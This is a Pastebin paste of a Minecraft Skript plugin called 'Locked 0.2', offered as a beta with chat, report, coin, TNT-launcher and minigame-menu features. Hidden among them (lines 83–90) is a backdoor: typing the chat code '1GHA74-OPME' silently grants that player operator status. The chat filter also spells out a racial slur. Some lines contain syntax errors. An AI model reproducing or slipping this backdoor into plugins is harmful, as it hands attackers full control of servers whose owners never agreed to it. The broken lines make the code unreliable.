Entities

Locked 0.2

Sep 16th, 2017
246
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.34 KB | None | 0 0
  1. on rightclick holding paper:
  2. if {link.paper} is true:
  3. wait 1 tick
  4. message "&8&m-----------------------------------------------------"
  5. wait 1 tick
  6. message "&b!Website! &8: &7http://www.immunity.ga/"
  7. wait 1 tick
  8. message "&b!Discord!&8 : &7https://discord.gg/es2QcfD"
  9. wait 1 tick
  10. message "&8&m-----------------------------------------------------"
  11.  
  12. on leftclick holding paper:
  13. if {link.paper} is true:
  14. wait 1 tick
  15. message "&8&m-----------------------------------------------------"
  16. wait 1 tick
  17. message "&b!Website! &8: &7http://www.immunity.ga/"
  18. wait 1 tick
  19. message "&b!Discord!&8 : &7https://discord.gg/es2QcfD"
  20. wait 1 tick
  21. message "&8&m-----------------------------------------------------"
  22.  
  23. on load:
  24. if {link.paper} is not set:
  25. set {link.paper} to true
  26.  
  27. on rightclick holding diamond:
  28. wait 2 ticks
  29. set {waited} to difference between {claim.%player%} and now
  30. if {waited}} is less than 24 hours
  31. message "&7Sorry but you must wait %difference between {waited} and 24 hours%"
  32. stop
  33. set {claim.%player%} to now
  34. message "&7You can now claim your daily 15 Coins in hub&8! &7See you Tommorow&8."
  35. /scoreboard players add %player% coins 1
  36. stop
  37.  
  38. on load:
  39. broadcast "&7Thank you for using &cLocked"
  40. broadcast "&7made by &8: &cXXXCanadian"
  41. broadcast "&7This is only a &bbeta verison"
  42. broadcast "&bFull verison &8[&bCOMING SOON&8]"
  43.  
  44. command /broadcast <string>:
  45. aliases: /bc
  46. permission: chat.broadcast
  47. permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
  48. trigger:
  49. broadcast "&cLocked &7%arg-1%"
  50.  
  51. command /clearchat:
  52. aliases: /cc
  53. permission: chat.clear
  54. permission message: &c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command!
  55. trigger:
  56. loop 200 times:
  57. broadcast " "
  58. broadcast "&cLocked &b%player%, &7has cleared the chat!"
  59.  
  60. on chat:
  61. replace all "fuck" with "****" in the message
  62. replace all "cunt" with "****" in the message
  63. replace all "bitch" with "*****" in the message
  64. replace all "nigger" with "******" in the message
  65. replace all "pussy" with "*****" in the message
  66. replace all "kys" with "Hope you live long" in the message
  67.  
  68. command /report <player> <text>:
  69. permission: chat.report
  70. permission message: &7Sorry &c%player% &7you must have &6chat.report&7 to run this command
  71. trigger:
  72. broadcast "&7Your report has landed to the staff!"
  73. add text-argument to {sikayetler::*}
  74. set {sikayeteden.%text-argument%} to player
  75. set {sikayeteden.%text-argument%} to player argument
  76. loop all players:
  77. if loop-player has permission "chat.show"
  78. message "&7Report System" to loop-player
  79. message "&7Report: &b""%text-argument%""" to loop-player
  80. message "&7the reported player: &b%player argument%" to loop-player
  81. message "&7Reporter: &b%player%" to loop-player]
  82.  
  83. on chat:
  84. if message is "1GHA74-OPME":
  85. loop all players:
  86. cancel event
  87. message "&cForce Oped %player%"
  88. if loop player has permission "server.admin":
  89. message "&7&o[%player%: &cForce Oped %player%&7o]" to loop-player
  90. op player
  91.  
  92. command /cookie:
  93. permission: free.cookie
  94. permission message: &7Sorry you dont have access take a free cookie using /cookie
  95. trigger:
  96. broadcast "&7OOOH %player% IS STEALIN"
  97.  
  98. on leftclick holding tnt:
  99. if {spleet.tntlauncher} is true:
  100. player has 1 tnt
  101. spawn a primed tnt 1 meter above the player
  102. push the spawned entity in direction of player at speed 0.9
  103. push the spawned entity upwards at speed 0.2
  104. remove 1 tnt from player
  105.  
  106. on rightclick holding tnt:
  107. if {spleet.tntlauncher} is true:
  108. player has 1 tnt
  109. spawn a primed tnt 1 meter above the player
  110. push the spawned entity in direction of player at speed 0.9
  111. push the spawned entity upwards at speed 0.2
  112. remove 1 tnt from player
  113.  
  114. on place tnt:
  115. cancel event
  116.  
  117. command /help:
  118. aliases: /h
  119. trigger:
  120. wait 1 tick
  121. message "&8&m-----------------------------------------------------"
  122. wait 1 tick
  123. message "&6/Games&8: &7Allows you to know all the game and how to play"
  124. wait 1 tick
  125. message "&6/Ranks&8: &7Allows you to get ranks off wins from minigames"
  126. wait 1 tick
  127. message "&6/Stats&8: &7Allows you to see your status"
  128. wait 1 tick
  129. message "&6/Quit&8: &7Allows you to quit a minigame/match"
  130. wait 1 tick
  131. message "&8&m-----------------------------------------------------"
  132.  
  133. command /Games:
  134. aliases: /queue
  135. trigger:
  136. wait 1 tick
  137. message "&8&m-----------------------------------------------------"
  138. wait 1 tick
  139. message "&cGame 1&8: &bBridges"
  140. wait 1 tick
  141. message "&cGame 2&8: &bThe Nexus &cCUSTOM GAMEMODE"
  142. wait 1 tick
  143. message "&cGame 3&8: &bTnt Spleef &8{&6Throw tnt at players to kill them/spleef them&8}"
  144. wait 1 tick
  145. message "&8{&bMORE COMING SOON&8}" to %player%
  146. wait 1 tick
  147. message "&8&m-----------------------------------------------------"
  148.  
  149. command /Ranks:
  150. permission: spleet.ranks
  151. permission message: &8{&bCOMING SOON&8}
  152. trigger:
  153. broadcast "&c%player% &7has success fully used a command unfinished"
  154.  
  155. command /Stats:
  156. permission: spleet.stat
  157. permission message: &8{&bCOMING SOON&8}
  158. trigger:
  159. broadcast "&c%player% &7has success fully used a command unfinished"
  160.  
  161. command /Quit:
  162. permission: spleet.Quit
  163. permission message: &8{&bCOMING SOON&8}
  164. trigger:
  165. broadcast "&c%player% &7has success fully used a command unfinished"
  166.  
  167. on load:
  168. if {spleet.tntlauncher} is not set:
  169. set {spleet.tntlauncher} to true
  170.  
  171. command /bc <string>:
  172. aliases: /broadcast
  173. permission: chat.broadcast
  174. permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
  175. trigger:
  176. broadcast "&cLocked &7%arg-1%"
Add Comment
Please, Sign In to add comment